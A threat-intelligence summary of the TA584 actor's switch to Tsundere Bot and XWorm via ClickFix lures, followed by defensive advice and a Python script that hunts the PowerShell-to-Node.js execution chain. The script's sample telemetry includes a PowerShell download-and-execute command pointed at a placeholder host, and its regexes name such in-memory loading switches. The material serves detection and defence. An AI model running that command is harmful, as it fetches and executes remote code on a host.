TA584 Shifts to Tsundere Bot for Ransomware Operations

A prolific initial access broker (IAB) tracked as TA584 has adopted the Tsundere Bot malware alongside XWorm RAT to gain footholds in enterprise networks, setting the stage for ransomware attacks.

Key Findings

  • Actor: TA584 (active since 2020, tracked by Proofpoint).
  • Recent activity: Tripled in volume in late 2025 compared to Q1.
  • Target regions: Expanded beyond North America & UK/Ireland → now includes Germany, wider Europe, and Australia.
  • Attack chain:
    1. Emails sent via compromised accounts (using SendGrid and Amazon SES).
    2. Redirect chains with traffic direction systems (TDS) like Keitaro.
    3. CAPTCHA page → ClickFix page instructing victims to run a PowerShell command.
    4. Command loads XWorm or Tsundere Bot into memory, then redirects to a benign site for deception.

Tsundere Bot – Capabilities

  • Type: Malware-as-a-Service (MaaS) backdoor + loader.
  • Runtime dependency: installs Node.js on the host via installers generated by the C2.
  • C2 infrastructure:
    • Retrieves addresses from the Ethereum blockchain (EtherHiding technique).
    • Includes hardcoded fallback addresses.
    • Communicates via WebSockets.
  • Features:
    • System profiling (OS, RAM, drivers, network info).
    • Arbitrary JavaScript execution from C2.
    • SOCKS proxy support (infected hosts used as relays).
    • Locale check → aborts if a CIS-region language is detected (especially Russian).
    • Built-in marketplace for buying/selling infected bots.

Threat Context

  • Origins: First documented by Kaspersky in 2025, linked to 123 Stealer malware.
  • Capabilities: Information gathering, data exfiltration, lateral movement, payload installation.
  • Payload diversity: TA584 has historically deployed Ursnif, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT, and more.
  • Ransomware risk: Proofpoint assesses with high confidence that Tsundere Bot infections can escalate into ransomware incidents.

Defensive Recommendations

  • Email security: Harden against phishing from compromised accounts; monitor for unusual SES/SendGrid traffic.
  • Endpoint monitoring: Detect suspicious PowerShell execution chains and Node.js installations.
  • Blockchain monitoring: Watch for EtherHiding-based C2 retrieval attempts.
  • Network defense: Inspect WebSocket traffic and SOCKS proxy activity.
  • Threat hunting: Look for ClickFix-style lures and CAPTCHA → PowerShell execution patterns.
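The endpoint-monitoring and threat-hunting items above describe one execution chain: a ClickFix lure gets the user to paste a PowerShell command into the Run dialog, that PowerShell downloads and runs a stage in memory, and a Node.js runtime is then installed and launched. The following is an added illustration (not code from Proofpoint or from the report) of how that chain can be hunted in process-creation telemetry; the events, paths, URL and the `explorer.exe`-parent and command-line heuristics are constructed assumptions, not indicators from the page.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1200, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr http://placeholder.invalid/x)"'},
    {"pid": 4200, "ppid": 4120,
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmd": r"node.exe C:\Users\u\AppData\Local\Temp\loader.js"},
    {"pid": 5000, "ppid": 900, "parent": r"C:\Program Files\Vendor\agent.exe",  # benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -File C:\scripts\inventory.ps1"},
]

POWERSHELL = re.compile(r"^(powershell|pwsh)(\.exe)?$", re.I)
# Download-and-execute / hidden-window switches typical of ClickFix one-liners.
IN_MEMORY = re.compile(
    r"\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def flag_event(ev):
    """Return the list of reasons a single event looks like the ClickFix chain."""
    img, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmd"]
    reasons = []
    if POWERSHELL.match(img):
        # Text pasted into Win+R is executed by explorer.exe, so it becomes the parent.
        if parent == "explorer.exe":
            reasons.append("powershell spawned by explorer.exe (Run dialog / ClickFix)")
        if IN_MEMORY.search(cmd):
            reasons.append("download-and-execute or hidden-window switches")
    node_install = img == "msiexec.exe" and "node" in cmd.lower()
    if POWERSHELL.match(parent) and (img == "node.exe" or node_install):
        reasons.append("Node.js runtime launched from PowerShell")
    return reasons


def hunt(events):
    """Map pid -> reasons; a child of a flagged process inherits a chain note."""
    flagged = {}
    for ev in events:  # assumes events are ordered by creation time
        reasons = flag_event(ev)
        if ev["ppid"] in flagged:
            reasons.append(f"parent pid {ev['ppid']} already flagged (execution chain)")
        if reasons:
            flagged[ev["pid"]] = reasons
    return flagged
```

Running `hunt(SAMPLE_EVENTS)` flags the explorer-spawned PowerShell and the node.exe it launched, and leaves the vendor agent's scheduled script alone.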

Takeaway

TA584’s adoption of Tsundere Bot reflects the growing use of malware-as-a-service platforms that combine stealthy loaders, blockchain-based C2, and resale markets. This evolution makes initial access brokers more dangerous, as infections can quickly pivot into ransomware deployment.
